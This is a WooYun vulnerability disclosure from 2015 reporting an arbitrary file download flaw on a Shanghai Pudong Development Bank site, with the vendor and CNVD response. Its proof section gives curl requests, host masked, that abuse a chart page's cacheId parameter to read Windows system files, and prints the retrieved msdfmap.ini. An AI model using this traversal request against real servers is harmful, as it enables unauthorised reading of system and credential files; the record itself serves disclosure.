当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153394

漏洞标题:上海浦东发展银行某站任意文件遍历

相关厂商:上海浦东发展银行

漏洞作者: 路人甲

提交时间:2015-11-10 17:59

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

curl -i http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/win.ini

11.png

漏洞证明:

curl http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/msdfmap.ini

;[connect name] will modify the connection if ADC.connect="name"
;[connect default] will modify the connection if name is not found
;[sql name] will modify the Sql if ADC.sql="name(args)"
;[sql default] will modify the Sql if name is not found
;Override strings: Connect, UserId, Password, Sql.
;Only the Sql strings support parameters using "?"
;The override strings must not equal "" or they are ignored
;A Sql entry must exist in each sql section or the section is ignored
;An Access entry must exist in each connect section or the section is ignored
;Access=NoAccess
;Access=ReadOnly
;Access=ReadWrite
;[userlist name] allows specific users to have special access
;The Access is computed as follows:
; (1) First take the access of the connect section.
; (2) If a user entry is found, it will override.
[connect default]
;If we want to disable unknown connect values, we set Access to NoAccess
Access=NoAccess
[sql default]
;If we want to disable unknown sql values, we set Sql to an invalid query.
Sql=" "
[connect CustomerDatabase]
Access=ReadWrite
Connect="DSN=AdvWorks"
[sql CustomerById]
Sql="SELECT * FROM Customers WHERE CustomerID = ?"
[connect AuthorDatabase]
Access=ReadOnly
Connect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"
[userlist AuthorDatabase]
Administrator=ReadWrite
[sql AuthorById]
Sql="SELECT * FROM Authors WHERE au_id = ?"

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-20 17:10

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置;同时转由CNCERT发上海分中心。

最新状态:

暂无